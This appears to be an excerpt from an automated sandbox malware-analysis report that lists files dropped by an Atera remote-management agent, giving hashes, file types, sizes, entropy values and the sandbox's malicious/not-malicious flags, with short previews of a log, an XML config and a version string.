                                                                                                                                                                                                                                                                                              SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                                                                              SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                                                                              MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                                                                              SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                                                                              SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                                                                              SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):639
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.827702258558673
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:gSuIytXECSuIy6XEOMrDbSc4ECuZDUSBOQgVSo4Ywr6Vig+hf5r6VigoK4gVX:J+tXM+WVc4E3AQdcwjLJ5jjY
                                                                                                                                                                                                                                                                                              MD5:870C89A93169C04DA04BA45691292853
                                                                                                                                                                                                                                                                                              SHA1:E9A1A7C231D2B90BBF91B1D6FBC4189449D79F6D
                                                                                                                                                                                                                                                                                              SHA-256:4650DB2A312EDE87C199E7E24D2C78E9B1DA03F6A8E5F98DFA6274823431495B
                                                                                                                                                                                                                                                                                              SHA-512:52BAFDB557C05CCFBB936C3E495246FF046A69937AFE995A24A5EA476ED866F003F6D72217249040506A770DDFA2A872C82BF41BE19ED089B3B79C6E240FA595
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:06/01/2025 06:59:11 In Program static constructor, before instantiating _logger06/01/2025 06:59:11 In Program static constructor, after instantiating _logger without using _logger06/01/2025 06:59:11 Starting Main(), logging without using _logger..06/01/2025 06:59:11.543 am: Info: Before PollAll() call written at: 06/01/2025 06:59:11..06/01/2025 06:59:14.089 am: Info: In PollAll() before Poller.PollAll(false) written at: 06/01/2025 06:59:14..06/01/2025 06:59:14.168 am: Info: In PollAll() after Poller.PollAll(false) written at: 06/01/2025 06:59:14..06/01/2025 06:59:14.183 am: Info: After PollAll() call written at: 06/01/2025 06:59:14
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1246506
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                                                                              MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                                                                              SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                                                                              SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                                                                              SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):37936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                                                                              MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                                                                              SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                                                                              SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                                                                              SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1295
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                                                                              MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                                                                              SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                                                                              SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                                                                              SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                              MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                              SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                              SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                              SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=1.6
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                                                                              MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                                                                              SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                                                                              SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                                                                              SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                                                                              MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                                                                              SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                                                                              SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                                                                              SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                                                                              MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                                                                              SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                                                                              SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                                                                              SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):354352
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                                                                              MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                                                                              SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                                                                              SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
                                                                                                                                                                                                                                                                                              SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                              MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                                                                              SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                                                                              SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                                                                              SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):702512
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                                                                              MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                                                                              SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                                                                              SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                                                                              SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285744
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                                                                              MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                                                                              SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                                                                              SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                                                                              SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                                                                              MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                                                                              SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                                                                              SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                                                                              SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                                                                              MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                                                                              SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                                                                              SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                                                                              SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                                                                              MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                                                                              SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                                                                              SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                                                                              SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                                                                              MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                                                                              SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                                                                              SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                                                                              SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                                                                              MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                                                                              SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                                                                              SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                                                                              SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27184
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                                                                              MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                                                                              SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                                                                              SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                                                                              SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                                                                              MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                                                                              SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                                                                              SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                                                                              SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3589532
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9999266027103735
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:98304:YylpVobXLx8h6xRBXbtjPZX622ysoac658SrSOubme:YGh6/h36ZesPu5V
                                                                                                                                                                                                                                                                                              MD5:93E4C198656FC267F392DE11DEE01CD0
                                                                                                                                                                                                                                                                                              SHA1:E92CB59486745EE7564F5B374E790A065E1F4678
                                                                                                                                                                                                                                                                                              SHA-256:88B220F9F9BF25F856DDA714AA1A1AE998720780CD3EC5B968154E03834FA965
                                                                                                                                                                                                                                                                                              SHA-512:3A04A02982DBBBB9D54B6C5674F2F2C10E0CBCE580E3974CD924CC9131CD94AECE71C7B975C9ABAAE82F057C70243FB016D31339E8700C96BD55C434BB98105F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):407080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.258938058111771
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:hkeEB9gZiG47PijJOcABetwyGRUAvILNqe8R:hETbPgJ9wyGmAvx
